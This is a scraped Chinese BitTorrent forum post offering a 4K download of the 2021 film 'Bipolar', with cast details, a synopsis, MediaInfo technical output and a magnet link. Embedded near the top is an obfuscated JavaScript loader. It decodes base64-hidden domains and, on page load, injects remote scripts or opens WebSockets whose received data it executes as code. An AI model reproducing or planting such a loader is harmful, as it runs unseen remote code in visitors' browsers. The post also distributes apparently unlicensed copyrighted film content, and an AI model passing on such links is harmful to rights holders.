只是一次偶然的旅行[国语中字].Bipolar.2021.2160p.4K.WEB-DL.H265.DDP5.1 11.73GB

版主小s 1月前 295

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 只是一次偶然的旅行 / 昆的故事 / Bipolar
◎年  代 2021
◎产  地 中国大陆
◎类  别 剧情
◎语  言 汉语普通话 / 英语
◎上映日期 2021-06-18(中国大陆) / 2021-02-02(鹿特丹国际电影节)
◎IMDb链接 https://www.imdb.com/title/tt13695988/
◎豆瓣评分 5.6/10 (1966人评价)
◎豆瓣链接 https://movie.douban.com/subject/34797546/
◎片  长 111分钟
◎导  演 李孟桥 Queena Li (id:1439224)
◎编  剧 李孟桥 Queena Li (id:1439224)
       D.C.  (id:1455127)
       高萨 Gosha Wen (id:1458709)
◎演  员 窦靖童 Leah Dou (id:1365193)
       贺开朗 Kailang He (id:1445208)
       王志文 Zhiwen Wang (id:1010208)
       田壮壮 Zhuangzhuang Tian (id:1274287)
       巴金旺甲  (id:1375491)
       央吉玛 Yunggiema (id:1338463)
       张大大 Dada Zhang (id:1347886)
       项偞婧 CiCi (id:1422856)
       阿尔·狄 AL Di (id:1443590)
       钦哲诺布  (id:1460044)
       窦靖童 Leah Dou (id:1365193)
       柯昱名 Aloka (id:1455128)
       田壮壮 Zhuangzhuang Tian (id:1274287)
       D.C.  (id:1455127)
       张阳 Yang Zhang (id:1378375)

◎标  签 窦靖童 / 文艺 / 公路 / 西藏 / 黑白 / 中国电影 / 大陆 / 李孟桥

◎简  介
  女孩(窦靖童 饰)独自来到拉萨旅行,而一只被供奉的“七彩神虾”意外改变了她的所有计划。女孩决定独自驾车穿越半个中国将神虾送归大海。一路上,她遇到了形色各异的人和事,回忆、梦境与幻觉也断续涌现在她眼前。最终,放虾之旅以意想不到的方式落幕,女孩也抵达了她内心最隐秘的世界。

◎获奖情况 (共1项)
  第50届鹿特丹国际电影节 (2021)
  老虎奖(提名)
   └──李孟桥 (id:1439224)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 183201594216043735266189658674395776596 (0x89D357F7381E44D296016775A2368654)

  4. Complete name                            : 只是一次偶然的旅行[email protected]

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 11.7 GiB

  8. Duration                                 : 1 h 50 min

  9. Overall bit rate                         : 15.2 Mb/s

  10. Encoded date                             : UTC 2021-08-19 08:31:34

  11. Writing application                      : mkvmerge v51.0.0 ('I Wish') 64-bit

  12. Writing library                          : libebml v1.4.0 + libmatroska v1.6.2


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : [email protected]@High

  18. Codec ID                                 : V_MPEGH/ISO/HEVC

  19. Duration                                 : 1 h 50 min

  20. Bit rate                                 : 15.0 Mb/s

  21. Width                                    : 4 096 pixels

  22. Height                                   : 1 716 pixels

  23. Display aspect ratio                     : 2.40:1

  24. Frame rate mode                          : Constant

  25. Frame rate                               : 25.000 FPS

  26. Color space                              : YUV

  27. Chroma subsampling                       : 4:2:0

  28. Bit depth                                : 8 bits

  29. Bits/(Pixel*Frame)                       : 0.085

  30. Stream size                              : 11.5 GiB (98%)

  31. Default                                  : Yes

  32. Forced                                   : No


  33. Audio

  34. ID                                       : 2

  35. Format                                   : E-AC-3

  36. Format/Info                              : Enhanced AC-3

  37. Commercial name                          : Dolby Digital Plus

  38. Codec ID                                 : A_EAC3

  39. Duration                                 : 1 h 50 min

  40. Bit rate mode                            : Constant

  41. Bit rate                                 : 256 kb/s

  42. Channel(s)                               : 6 channels

  43. Channel layout                           : L R C LFE Ls Rs

  44. Sampling rate                            : 48.0 kHz

  45. Frame rate                               : 31.250 FPS (1536 SPF)

  46. Compression mode                         : Lossy

  47. Stream size                              : 202 MiB (2%)

  48. Service kind                             : Complete Main

  49. Default                                  : Yes

  50. Forced                                   : No



TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:7601F4BBF3DC04947B6615A4265A0D6AA365B02A
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回